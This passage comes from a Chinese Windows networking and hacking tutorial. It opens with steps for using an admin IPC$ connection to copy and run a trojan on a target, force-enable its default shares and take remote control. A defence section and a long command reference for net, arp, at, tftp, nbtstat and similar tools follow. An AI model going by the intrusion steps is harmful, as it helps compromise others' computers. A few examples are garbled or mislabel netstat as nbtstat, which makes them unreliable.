muma.exe y:pathmuma.exe 。当路径中包含空格时,须用""将路径全引住。 7,如何删除映射和ipc$连接? 答:用命令 net use \IPipc$ /del 删除和一个目标的ipc$连接。 用命令 net use z: /del 删除映射的z盘,其他盘类推。 用命令 net use * /del 删除全部。会有提示要求按y确认。 8,连上ipc$然后我能做什么? 答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。 9,怎样防止别人用ips$和默认共享入侵我? 答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。 1,先把已有的删除 net share ipc$ /del net share admin$ /del net share c$ /del …………(有几个删几个) 2,禁止别人空连接 首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous(DWORD)的键值改为:00000002。 3,禁止自动打开默认共享 对于server版,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer(DWORD)的键值改为:00000000。 对于pro版,则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:00000000。 如果上面所说的主键不存在,就新建一个再改键值。 B、另一种是关闭ipc$和默认共享依赖的服务(不推荐) net stop lanmanserver 可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。 C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。 D、还有一个办法就是装防火墙,或者端口过滤。 第7章 DOS 常用命令: dir 列文件名 deltree 删除目录树 cls 清屏 cd 改变当前目录 copy 拷贝文件 diskcopy 复制磁盘 del 删除文件 format 格式化磁盘 edit 文本编辑 mem 查看内存状况 md 建立子目录 move 移动文件、改目录名 more 分屏显示 type 显示文件内容 rd 删除目录 sys 制作DOS系统盘 ren 改变文件名 xcopy 拷贝目录与文件 chkdsk 检查磁盘 attrib 设置文件属性 fdisk 硬盘分区 date 显示及修改日期 label 设置卷标号 defrag 磁盘碎片整理 msd 系统检测 path 设置搜寻目录 share 文件共享 memmaker内存优化管理 help 帮助 restore 恢复备份文件 set 设置环境变量 time 显示及修改时间 tree 列目录树 debug 随机调试程序 doskey 重新调用DOS命令 prempt 设置提示符 undelete恢复被删的文件 scandisk检测、修理磁盘 不常用DOS命令 diskcomp磁盘比较  append 设置非执行文件路径 expand 还原DOS文件 fasthelp快速显示帮助信息 fc 文件比较 interink启动服务器 setver 设置版本 intersvr启动客户机 subst 路径替换 qbasic Basic集成环境 vsafe 防病毒 unformat恢复已格式化的磁盘 ver 显示DOS版本号 smartdrv设置磁盘加速器 vol 显示磁盘卷标号 lh 将程序装入高端内存 ctty 改变控制设备 emm386 扩展内存管理 常用命令具体介绍: 一、Dir 显示目录文件和子目录列表,呵呵,这个当然是人人要知道的。 可以使用通配符(? 和 *),?表通配一个字符,*表通配任意字符 *.后缀 指定要查看后缀的文件。上面其实也可以为“ .后缀”,例如dir *.exe 等于dir .exe /p 每次显示一个列表屏幕。要查看下一屏,请按键盘上的任意键。 /w 以宽格式显示列表,在每一行上最多显示 5 个文件名或目录名。 /s 列出指定目录及所有子目录中出现的每个指定的文件名。比win环境下的查找快多了 dir *.* -> a.txt 把当前目录文件列表写入a.txt dir *.* /s -> a.txt 把当前目录文件列表写入a.txt,包括子目录下文件。 二、Attrib 显示、设置或删除指派给文件或目录的只读、存档、系统以及隐藏属性。如果在不含参数的情况下使用,则 attrib 会显示当前目录中所有文件的属性。 +r 设置只读属性。 -r 清除只读属性。 +a 设置存档文件属性。 -a 清除存档文件属性。 +s 设置系统属性。 -s 清除系统属性。 +h 设置隐藏属性。 -h 清除隐藏属性。 三、Cls 清除显示在命令提示符窗口中的所有信息,并返回空窗口,即“清屏” 四、Exit 退出当前命令解释程序并返回到系统。 五、format 格式化 /q 执行快速格式化。删除以前已格式化卷的文件表和根目录,但不在扇区之间扫描损坏区域。使用 /q 命令行选项应该仅格式化以前已格式化的完好的卷。 六、Ipconfig 显示所有当前的 TCP/IP 网络配置值、刷新动态主机配置协议 (DHCP) 和域名系统 (DNS) 设置。使用不带参数的 ipconfig 可以显示所有适配器的 IP 地址、子网掩码、默认网关。 /all 显示所有适配器的完整 TCP/IP 配置信息。 ipconfig 等价于 winipcfg,后者在ME、98 和 95 上可用。尽管 Windows XP 没有提供象 winipcfg 命令一样的图形化界面,但可以使用“网络连接”查看和更新 IP 地址。要做到这一点,请打开 网络连接,右键单击某一网络连接,单击“状态”,然后单击“支持”选项卡。 该命令最适用于配置为自动获取 IP 地址的计算机。它使用户可以确定哪些 TCP/IP 配置值是由 DHCP、自动专用 IP 地址 (APIPA) 和其他配置配置的。 七、md 创建目录或子目录 八、Move 将一个或多个文件从一个目录移动到指定的目录。 九、Nbtstat 显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。Nbtstat 命令行参数区分大小写。 -a remotename 显示远程计算机的 NetBIOS 名称表,其中,RemoteName 是远程计算机的 NetBIOS 计算机名称。 -A IPAddress 显示远程计算机的 NetBIOS 名称表,其名称由远程计算机的 IP 地址指定(以小数点分隔)。 十、Netstat 显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息(对于 IP、ICMP、TCP 和 UDP 协议)以及 IPv6 统计信息(对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议)。使用时如果不带参数,netstat 显示活动的 TCP 连接。 -a 显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。 十一、Ping 通过发送“网际消息控制协议 (ICMP)”回响请求消息来验证与另一台 TCP/IP 计算机的 IP 级连接。回响应答消息的接收情况将和往返过程的次数一起显示出来。Ping 是用于检测网络连接性、可到达性和名称解析的疑难问题的主要 TCP/IP 命令。如果不带参数,ping 将显示帮助。名称和Ip地址解析是它的最简单应用也是用的最多的。 -t 指定在中断前 ping 可以持续发送回响请求信息到目的地。要中断并显示统计信息,请按 CTRL-BREAK。要中断并退出 ping,请按 CTRL-C。 -lSize 指定发送的回响请求消息中“数据”字段的长度(以字节表示)。默认值为 32。size 的最大值是 65,527。 十二、Rename (Ren) 更改文件的名称。 例如 ren *.abc *.cba 十三、Set 显示、设置或删除环境变量。如果没有任何参数,set 命令将显示当前环境设置。 十四、Shutdown 允许您关闭或重新启动本地或远程计算机。如果没有使用参数,shutdown 将注销当前用户。 -m ComputerName 指定要关闭的计算机。 -t xx 将用于系统关闭的定时器设置为 xx 秒。默认值是 20 秒。 -l 注销当前用户,这是默认设置。-m ComputerName 优先。 -s 关闭本地计算机。 -r 关闭之后重新启动。 -a 中止关闭。除了 -l 和 ComputerName 外,系统将忽略其它参数。在超时期间,您只可以使用 -a。 十五、System File Checker (sfc) win下才有,在重新启动计算机后扫描和验证所有受保护的系统文件。 /scannow 立即扫描所有受保护的系统文件。 /scanonce 一次扫描所有受保护的系统文件。 /purgecache 立即清除“Windows 文件保护”文件高速缓存,并扫描所有受保护的系统文件。 /cachesize=x 设置“Windows 文件保护”文件高速缓存的大小,以 MB 为单位。 十六、type 显示文本文件的内容。使用 type 命令查看文本文件或者是bat文件而不修改文件 十七、Tree 图像化显示路径或驱动器中磁盘的目录结构。 十八、Xcopy 复制文件和目录,包括子目录。 /s 复制非空的目录和子目录。如果省略 /s,xcopy 将在一个目录中工作。 /e 复制所有子目录,包括空目录。 十九、copy 将一个或多个文件从一个位置复制到其他位置 二十、del 删除指定文件。 ftp和bat批命令和net和telnet由于子命令太多,这里不说了,不过这几个都是常用到的。 网络常用命令: 网络常用命令: 1.最基本,最常用的,测试物理网络的 ping 192.168.10.88 -t ,参数-t是等待用户去中断测试 2.查看DNS、IP、Mac等 A.Win98:winipcfg B.Win2000以上:Ipconfig/all C.NSLOOKUP:如查看河北的DNS C:\>nslookup Default Server: ns.hesjptt.net.cn Address: 202.99.160.68 >server 202.99.41.2 则将DNS改为了41.2 > pop.pcpop.com Server: ns.hesjptt.net.cn Address: 202.99.160.68 Non-authoritative answer: Name: pop.pcpop.com Address: 202.99.160.212 3.网络信使 Net send 计算机名/IP|* (广播) 传送内容,注意不能跨网段 net stop messenger 停止信使服务,也可以在面板-服务修改 net start messenger 开始信使服务 4.探测对方对方计算机名,所在的组、域及当前用户名 ping -a IP -t ,只显示NetBios名 nbtstat -a 192.168.10.146 比较全的 5.netstat -a 显示出你的计算机当前所开放的所有端口 netstat -s -e 比较详细的显示你的网络资料,包括TCP、UDP、ICMP 和 IP的统计等 6.探测arp绑定(动态和静态)列表,显示所有连接了我的计算机,显示对方IP和MAC地址 arp -a 7.在代理服务器端 捆绑IP和MAC地址,解决局域网内盗用IP: ARP -s 192.168.10.59 00-50-ff-6c-08-75 解除网卡的IP与MAC地址的绑定: arp -d 网卡IP 8.在网络邻居上隐藏你的计算机 net config server /hidden:yes net config server /hidden:no 则为开启 9.几个net命令 A.显示当前工作组服务器列表 net view,当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。 比如:查看这个IP上的共享资源,就可以 C:\>net view 192.168.10.8 在 192.168.10.8 的共享资源 资源共享名 类型 用途 注释 -------------------------------------- 网站服务 Disk 命令成功完成。 B.查看计算机上的用户帐号列表 net user C.查看网络链接 net use 例如:net use z: \\192.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘 D.记录链接 net session 例如: C:\>net session 计算机 用户名 客户类型 打开空闲时间 ------------------------------------------------------------------------------- \\192.168.10.110 ROME Windows 2000 2195 0 00:03:12 \\192.168.10.51 ROME Windows 2000 2195 0 00:00:39 命令成功完成。 10.路由跟踪命令 A.tracert pop.pcpop.com B.pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的% 11.关于共享安全的几个命令 A.查看你机器的共享资源 net share B.手工删除共享 net share c$ /d net share d$ /d net share ipc$ /d net share admin$ /d 注意$后有空格。 C.增加一个共享: c:\net share mymovie=e:\downloads\movie /users:1 mymovie 共享成功。 同时限制链接用户数为1人。 12.在DOS行下设置静态IP A.设置静态IP CMD netsh netsh>int interface>ip interface ip>set add "本地链接" static IP地址 mask gateway B.查看IP设置 interface ip>show address Arp 显示和修改"地址解析协议 (ARP)"缓存中的项目。ARP 缓存中包含一个或多个表,它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用,则 arp 命令将显示帮助信息。 语法 arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]] 参数 -a [InetAddr] [-N IfaceAddr] 显示所有接口的当前 ARP 缓存表。要显示指定 IP 地址的 ARP 缓存项,请使用带有 InetAddr 参数的 arp -a,此处的 InetAddr 代表指定的 IP 地址。要显示指定接口的 ARP 缓存表,请使用 -N IfaceAddr 参数,此处的 IfaceAddr 代表分配给指定接口的 IP 地址。-N 参数区分大小写。 -g [InetAddr] [-N IfaceAddr] 与 -a 相同。 -d InetAddr [IfaceAddr] 删除指定的 IP 地址项,此处的 InetAddr 代表 IP 地址。对于指定的接口,要删除表中的某项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。要删除所有项,请使用星号 (*) 通配符代替 InetAddr。 -s InetAddr EtherAddr [IfaceAddr] 向 ARP 缓存添加可将 IP 地址 InetAddr 解析成物理地址 EtherAddr 的静态项。要向指定接口的表添加静态 ARP 缓存项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。 /? 在命令提示符显示帮助。 注释 InetAddr 和 IfaceAddr 的 IP 地址用带圆点的十进制记数法表示。 物理地址 EtherAddr 由六个字节组成,这些字节用十六进制记数法表示并且用连字符隔开(比如,00-AA-00-4F-2A-9C)。 通过 -s 参数添加的项属于静态项,它们不会 ARP 缓存中超时。如果终止 TCP/IP 协议后再启动,这些项会被删除。要创建永久的静态 ARP 缓存项,请在批处理文件中使用适当的 arp 命令并通过"计划任务程序"在启动时运行该批处理文件。 只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。 范例 要显示所有接口的 ARP 缓存表,可键入: arp -a 对于指派的 IP 地址为 10.0.0.99 的接口,要显示其 ARP 缓存表,可键入: arp -a -N 10.0.0.99 要添加将 IP 地址 10.0.0.80 解析成物理地址 00-AA-00-4F-2A-9C 的静态 ARP 缓存项,可键入:arp -s 10.0.0.80 00-AA-00-4F-2A-9C 13.At 计划在指定时间和日期在计算机上运行命令和程序。at 命令只能在"计划"服务运行时使用。如果在没有参数的情况下使用,则 at 列出已计划的命令。 语法 at [\\ComputerName] [{[ID] [/delete]|/delete [/yes]}] at [[\\ComputerName] hours:minutes [/interactive] [{/every:date[,...]|/next:date[,...]}] command] 参数 \\computername 指定远程计算机。如果省略该参数,则 at 计划本地计算机上的命令和程序。 ID 指定指派给已计划命令的识别码。 /delete 取消已计划的命令。如果省略了 ID,则计算机中所有已计划的命令将被取消。 /yes 删除已计划的事件时,对来自系统的所有询问都回答"是"。 hours:minutes 指定命令运行的时间。该时间用 24 小时制(即从 00:00 [午夜] 到 23:59)的 小时: 分钟格式表示。 /interactive 对于在运行 command 时登录的用户,允许 command 与该用户的桌面进行交互。 /every: 在每个星期或月的指定日期(例如,每个星期四,或每月的第三天)运行 command 命令。 date 指定运行命令的日期。可以指定一周的某日或多日(即,键入 M、T、W、Th、F、S、Su)或一个月中的某日或多日(即,键入从 1 到31 之间的数字)。用逗号分隔多个日期项。如果省略了 date,则 at 使用该月的当前日。 /next: 在下一个指定日期(比如,下一个星期四)到来时运行 command。 command 指定要运行的 Windows 命令、程序(.exe 或 .com 文件)或批处理程序(.bat 或 .cmd 文件)。当命令需要路径作为参数时,请使用绝对路径,也就是从驱动器号开始的整个路径。如果命令在远程计算机上,请指定服务器和共享名的通用命名协定 (UNC) 符号,而不是远程驱动器号。 /? 在命令提示符显示帮助。 注释 Schtasks 是功能更为强大的超集命令行计划工具,它含有 at 命令行工具中的所有功能。对于所有的命令行计划任务,都可以使用 schtasks 来替代 at。有关 schtasks 的详细信息,请参阅"相关主题"。 使用 at 使用 at 命令时,要求您必须是本地 Administrators 组的成员。 加载 Cmd.exe 在运行命令之前,At 不会自动加载 Cmd.exe (命令解释器)。如果没有运行可执行文件 (.exe),则在命令开头必须使用如下所示的方法专门加载 Cmd.exe: cmd /c dir > c:\test.out。 查看已计划的命令 当不带命令行选项使用 at 时,计划任务会出现在类似于以下格式的表中: Status ID Day Time Command Line OK 1 Each F 4:30 PM net send group leads status due OK 2 Each M 12:00 AM chkstor > check.file OK 3 Each F 11:59 PM backup2.bat 包含标识号 (ID) 当在命令提示下使用带有标识号 (ID) 的 at 命令时,单个任务项的信息会显示在类似于下面的格式中: Task ID:1 Status:OK Schedule:Each F Time of Day:4:30 PM Command:net send group leads status due当计划带有 at 的命令(尤其是带有命令行选项的命令)后,要通过键入不带命令行选项的 at 来检查该命令语法是否输入正确。如果显示在"命令行"列中的信息不正确,请删除该命令,然后重新键入它。如果还不正确,则可以在重新键入该命令时让它少带些命令行选项。查看结果 使用 at 的已经计划的命令作为后台程序运行。运行结果不会显示在计算机上。要将输出重定向到文件,请使用重定向符号 (>)。如果将输出重定向到文件,则不论是在命令行还是在批处理文件中使用 at,都需要在重定向符号之前使用转义符 (^)。例如,要重定向输出到 Output.text 文件,则要键入: at 14:45 c:\test.bat ^>c:\output.txt 执行命令的当前目录为 systemroot 文件夹。 更改系统时间 在使用 at 命令计划了要运行的命令之后,如果更改了计算机的系统时间,则通过键入不带命令行选项的 at 可使 at 计划程序与修改后的系统时间同步。 存储命令 已计划的命令存储在注册表中。这样,如果重新启动"计划"服务,则不会丢失计划任务。 连接到网络驱动器 对于需要访问网络的计划作业,请不要使用已重新定向的驱动器。"计划"服务可能无法访问这些重定向的驱动器,或者,在该计划任务运行时如果有其他用户登录,则这些重定向的驱动器可能不会出现。因此,对于计划作业,请使用 UNC 路径。例如: at 1:00pm my_backup \\server\share 请不要使用下述语法(其中 x: ?表示由用户建立的连接): at 1:00pm my_backup x: 如果计划了一个使用驱动器号的 at 命令来连接共享目录,则应包含一个 at 命令以使在完成该驱动器的使用时断开与驱动器的连接。如果不能断开与驱动器的连接,则在命令提示下,所指派的驱动器号将不可用。 范例 要显示 Marketing 服务器上已计划的命令列表,请键入: at \\marketing 要了解服务器 Corp 上标识号为 3 的命令的详细信息,请键入: at \\corp 3 要计划在上午 8:00 于 Corp 服务器上运行网络共享命令,并将该列表重定向到 Maintenance 服务器的 Corp.txt 文件(位于 Reports 共享目录下)中,请键入: at \\corp 08:00 cmd /c "net share reports=d:\marketing\reports >> \\maintenance\reports\corp.txt" 为了在每五天后的午夜将 Marketing 服务器的硬盘驱动器备份到磁带驱动器,首先创建名为 Archive.cmd 的批处理程序(它含有备份命令),然后计划该批处理程序的运行,为此请键入: at \\marketing 00:00 /every:5,10,15,20,25,30 archive 要取消当前服务器上已计划的所有命令,请按下述方法清除 at 计划信息: at /delete 如果要运行的命令不是可执行 (.exe) 文件,请按如下所示的方法在该命令之前使用 cmd /c 来加载 Cmd.exe: cmd /c dir > c:\test.out。 14.Rsh 在运行 RSH 服务的远程计算机上运行命令。Windows XP 和 Windows 2000 不提供 RSH 服务。Windows 2000 Server Resource Kit 提供名为 Rshsvc.exe 的 RSH 服务。使用不带参数的 rsh 显示帮助。 语法 rsh [Host] [-l UserName] [-n] [Command] 参数 Host 指定运行 command 的远程计算机。 -l UserName 指定远程计算机上使用的用户名。在省略情况下,使用当前登录用户的名称。 -n 将 rsh 的输入重定向到 NULL 设备。这防止本地计算机命令结果的显示。 Command 指定要运行的命令。 /? 在命令提示符显示帮助。 注释 标准操作 rsh 命令将标准输入复制到远程 command,将远程 command 的标准输出复制到其标准输出,将远程 command 的标准错误复制到其标准错误。Rsh 通常在远程命令终止时终止。 使用重定向符号 为了使重定向在远程计算机上发生,要以引号引住重定向符号(例如 ">>")。如果不使用引号,重定向会在本地计算机发生。例如,以下命令将远程文件"RemoteFile"附加到本地文件"LocalFile"中: rsh othercomputer cat remotefile >> localfile 以下命令将远程文件 Remotefile 附加到远程文件 otherremotefile 中: rsh othercomputer cat remotefile ">>" otherremotefile 使用 rsh 在使用已登录到某个域并且运行 Windows XP Professional 的计算机时,该域的主域控制器必须可用于确认用户名或 rsh 命令失败。 .rhosts 文件 .rhosts 文件通常许可 UNIX 系统的网络访问权限。.rhosts 文件列出可以访问远程计算机的计算机名及关联的登录名。在正确配置了 .rhosts 文件的远程计算机上运行 rcp、rexec 或 rsh 命令时,您不必提供远程计算机的登录和密码信息。 .rhosts 文件是一个文本文件,该文件中每一行为一个条目。条目由本地计算机名、本地用户名和有关该条目的所有注释组成。每个条目均由制表符或空格分开,注释用符号 (#) 打头。例如: host7 #This computer is in room 31A .rhosts 文件必须在远程计算机的用户主目录中。有关远程计算机 .rhosts 文件特定执行的详细信息,请参阅远程系统的文档。 只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。 范例 要以名称 admin1 在远程计算机 vax1 上执行 telcon 命令,请键入: rsh vax1 -l admin1 telcon 15.Tftp 向运行平凡文件传输协议 (TFTP) 服务或 daemon 的远程计算机(尤其是运行 UNIX 的计算机)传输文件或从运行平凡文件传输协议 (TFTP) 服务或 daemon 的远程计算机(尤其是运行 UNIX 的计算机)传输文件。 语法 tftp [-i] [Host] [{get | put}] [Source] [Destination] 参数 -i 指定二进制图像传送模式(也称为八进制模式)。在二进制图像模式下,文件以一个字节为单位进行传输。在传送二进制文件时使用该模式。如果省略了 -i,文件将以 ASCII 模式传送。这是默认的传送模式。该模式将行尾 (EOL) 字符转换为指定计算机的适当格式。传送文本文件时使用该模式。如果文件传送成功,将显示数据传输率。 Host 指定本地或远程计算机。 put 将本地计算机上的 Destination 文件传送到远程计算机上的 Source 文件。因为 TFTP 协议不支持用户身份验证,所以用户必须登录到远程计算机,同时文件在远程计算机上必须可写。 get 将远程计算机上的 Destination 文件传送到本地计算机上的 Source 文件。 Source 指定要传送的文件。 Destination 指定将文件传送到的位置。如果省略了 Destination,将假定它与 Source 同名。 /? 在命令提示符显示帮助。 注释 使用 get 参数 如果将本地计算机上的文件 FileTwo 传送到远程计算机上的文件 FileOne,则指定 put。如果将远程计算机上的文件 FileTwo 传送到远程计算机上的文件 FileOne,则指定 get。 Windows XP 或 Windows 2000 不提供一般用途的 TFTP 服务器。Windows 2000 提供的 TFTP 服务器服务只为 Windows XP 和 Windows 2000 客户端计算机提供远程引导功能。 只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。 范例 要从本地计算机将文件 Users.txt 传送到远程计算机 vax1 上的 Users19.txt,请键入: tftp vax1 put users.txt users19.txt 16.Nbtstat 显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。 语法 nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Interval] 参数 -a remotename 显示远程计算机的 NetBIOS 名称表,其中,RemoteName 是远程计算机的 NetBIOS 计算机名称。NetBIOS 名称表是运行在该计算机上的应用程序使用的 NetBIOS 名称列表。 -A IPAddress 显示远程计算机的 NetBIOS 名称表,其名称由远程计算机的 IP 地址指定(以小数点分隔)。 -c 显示 NetBIOS 名称缓存内容、NetBIOS 名称表及其解析的各个地址。 -n 显示本地计算机的 NetBIOS 名称表。Registered 中的状态表明该名称是通过广播或 WINS 服务器注册的。 -r 显示 NetBIOS 名称解析统计资料。在配置为使用 WINS 的 Windows XP 计算机上,该参数将返回已通过广播和 WINS 解析和注册的名称号码。 -R 清除 NetBIOS 名称缓存的内容并从 Lmhosts 文件中重新加载带有 #PRE 标记的项目。 -RR 重新释放并刷新通过 WINS 注册的本地计算机的 NetBIOS 名称。 -s 显示 NetBIOS 客户和服务器会话,并试图将目标 IP 地址转化为名称。 -S 显示 NetBIOS 客户和服务器会话,只通过 IP 地址列出远程计算机。 Interval 重新显示选择的统计资料,可以中断每个显示之间的 Interval 中指定的秒数。按 CTRL+C 停止重新显示统计信息。如果省略该参数,netstat 将只显示一次当前的配置信息。 /? 在命令提示符显示帮助。 注释 Nbtstat 命令行参数区分大小写。 下表列出了由 Nbtstat 生成的列标题。标题 说明 Input 接收的字节数。 Output 发送的字节数。 In/Out 该连接是否从计算机(传出)或者其他计算机到本地计算机(传入)。 Lift 名称表缓存项在被清除之前所存留的时间。 Local Name 本地 NetBIOS 名称与连接相关联。 Remote Host 与远程计算机相关的名称或 IP 地址。 <03> 转化为十六进制的 NetBIOS 名称的最后一个字节。每个 NetBIOS 名称长度均为 16 个字符。由于最后一个字节通常有特殊的意义,因为相同的名称(只有最后一个字节不同)可能在一台计算机上出现几次。例如,<20> 在 ASCII 文本中是一个空格。 Type 名称类型。名称可以是单个名称,也可以是组名称。 Status 远程计算机上是否在运行 NetBIOS 服务("已注册"),或同一计算机名是否已注册了相同的服务("冲突")。 State NetBIOS 连接的状态。 下表列出了可能的 NetBIOS 连接状态。状态 说明 已连接 会话已建立。 关联 连接的终结点已经被创建并与 IP 地址关联。 正接听 该终结点对内向连接可用。 空闲 该结束点已被打开单不能接收连接。 正在连接 会话处于连接阶段。在此阶段正在解析所选目标的由名称到 IP 地址的映射。 接受 入站会话当前正在被接受,将在短期内连接。 重新连接 会话将试图重新连接(如果第一次连接失败)。 出站 会话正处于连接阶段。此阶段正在创建 TCP 连接。 入站 入站会话在连接期。 正在断开 会话正在断开连接。 已中断连接 本地计算机已断开连接,并正等待远程系统的确认。 只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。 范例 要显示 NetBIOS 计算机名为 CORP07 的远程计算机的 NetBIOS 名称表,请键入: nbtstat -a CORP07 要显示所分配 IP 地址为 10.0.0.99 的远程计算机的 NetBIOS 名称表,请键入: nbtstat -A 10.0.0.99 要显示本地计算机的 NetBIOS 名称表,请键入: nbtstat -n 要显示本地计算机 NetBIOS 名称缓存的内容,请键入: nbtstat -c 要清除 NetBIOS 名称缓存并重新装载本地 Lmhosts 文件中带标记 #PRE 的项目,请键入: nbtstat -R 要释放通过 WINS 服务器注册的 NetBIOS 名称并对其重新注册,请键入: nbtstat -RR 要每隔 5 秒以 IP 地址显示 NetBIOS 会话统计资料,请键入: nbtstat -S 5 17.Netstat 显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息(对于 IP、ICMP、TCP 和 UDP 协议)以及 IPv6 统计信息(对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议)。使用时如果不带参数,netstat 显示活动的 TCP 连接。 语法 netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval] 参数 -a 显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。 -e 显示以太网统计信息,如发送和接收的字节数、数据包数。该参数可以与 -s 结合使用。 -n 显示活动的 TCP 连接,不过,只以数字形式表现地址和端口号,却不尝试确定名称。 -o 显示活动的 TCP 连接并包括每个连接的进程 ID (PID)。可以在 Windows 任务管理器中的"进程"选项卡上找到基于 PID 的应用程序。该参数可以与 -a、-n 和 -p 结合使用。 -p Protocol 显示 Protocol 所指定的协议的连接。在这种情况下,Protocol 可以是 tcp、udp、tcpv6 或 udpv6。如果该参数与 -s 一起使用按协议显示统计信息,则 Protocol 可以是 tcp、udp、icmp、ip、tcpv6、udpv6、icmpv6 或 ipv6。 -s 按协议显示统计信息。默认情况下,显示 TCP、UDP、ICMP 和 IP 协议的统计信息。如果安装了 Windows XP 的 IPv6 协议,就会显示有关 IPv6 上的 TCP、IPv6 上的 UDP、ICMPv6 和 IPv6 协议的统计信息。可以使用 -p 参数指定协议集。 -r 显示 IP 路由表的内容。该参数与 route print 命令等价。 Interval 每隔 Interval 秒重新显示一次选定的信息。按 CTRL+C 停止重新显示统计信息。如果省略该参数,netstat 将只打印一次选定的信息。 /? 在命令提示符显示帮助。 注释 与该命令一起使用的参数必须以连字符 (-) 而不是以短斜线 (/) 作为前缀。 Netstat 提供下列统计信息: Proto 协议的名称(TCP 或 UDP)。 Local Address 本地计算机的 IP 地址和正在使用的端口号。如果不指定 -n 参数,就显示与 IP 地址和端口的名称对应的本地计算机名称。如果端口尚未建立,端口以星号(*)显示。 Foreign Address 连接该插槽的远程计算机的 IP 地址和端口号码。如果不指定 -n 参数,就显示与 IP 地址和端口对应的名称。如果端口尚未建立,端口以星号(*)显示。 (state) 表明 TCP 连接的状态。可能的状态如下: CLOSE_WAIT CLOSED ESTABLISHED FIN_WAIT_1 FIN_WAIT_2 LAST_ACK LISTEN SYN_RECEIVED SYN_SEND TIMED_WAIT 有关 TCP 连接状态的信息,请参阅 RFC 793。 只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。 范例 要想显示以太网统计信息和所有协议的统计信息,请键入下列命令: netstat -e -s 要想仅显示 TCP 和 UDP 协议的统计信息,请键入下列命令: netstat -s -p tcp udp 要想每 5 秒钟显示一次活动的 TCP 连接和进程 ID,请键入下列命令: nbtstat -o 5 要想以数字形式显示活动的 TCP 连接和进程 ID,请键入下列命令: nbtstat -n -o 18.Runas 允许用户用其他权限运行指定的工具和程序,而不是用户当前登录提供的权限。 语法 runas [{/profile|/noprofile}] [/env] [/netonly] [/smartcard] [/showtrustlevels] [/trustlevel] /user:UserAccountName program 参数 /profile 加载用户的配置文件。/profile 是默认值。 /no profile /noprofile 指定不加载用户的配置文件。这使应用程序载入的更加快速,但是在一些应用程序中也会引起错误。 /env 指定当前使用的网络环境,而不是用户的本地环境。 /netonly 指明指定的用户信息只用于远程访问。 /smartcard /smartcard 表示凭据是否是由智能卡提供的。 /showtrustlevels 列出 /trustlevel 开关项。 /trustlevel 指定应用程序运行所在的授权级别。使用 /showtrustlevels 查看可用的信任级别。 /user:UserAccountName 指定在其下运行程序的用户帐户的名称。用户帐户的格式应是 user@domain 或 domain\user。 程序 指定要用在 /user 中指定的帐户运行的程序或命令。 /? 在命令提示符显示帮助。 注释 管理员可以使用一个权限受限制的帐户执行日常、非管理性的任务,只有在执行特定管理任务时,才使用一个权限更大的帐户。要不经过注销再重新登录就完成这样的任务,可以用一般帐户登录,然后使用 runas 命令来运行需要更大权限的工具。 有关 runas 命令的使用范例,请参阅"相关主题"。 尽管 runas 通常由 Administrator 帐户使用,但并非仅限于 Administrator 帐户。任何拥有多个帐户的用户均可以利用备用凭据,使用 runas 运行程序、MMC 控制台或"控制面板"项。 如果要在计算机上使用 Administrator 帐户,对于 /user:,键入下列参数之一: /user:AdministratorAccountName@ComputerName /user:ComputerName\AdministratorAccountName 如果想以域管理员身份使用这个命令,键入下列参数之一: /user:AdministratorAccountName@DomainName /user:DomainName\AdministratorAccountName runas 命令允许您运行程序 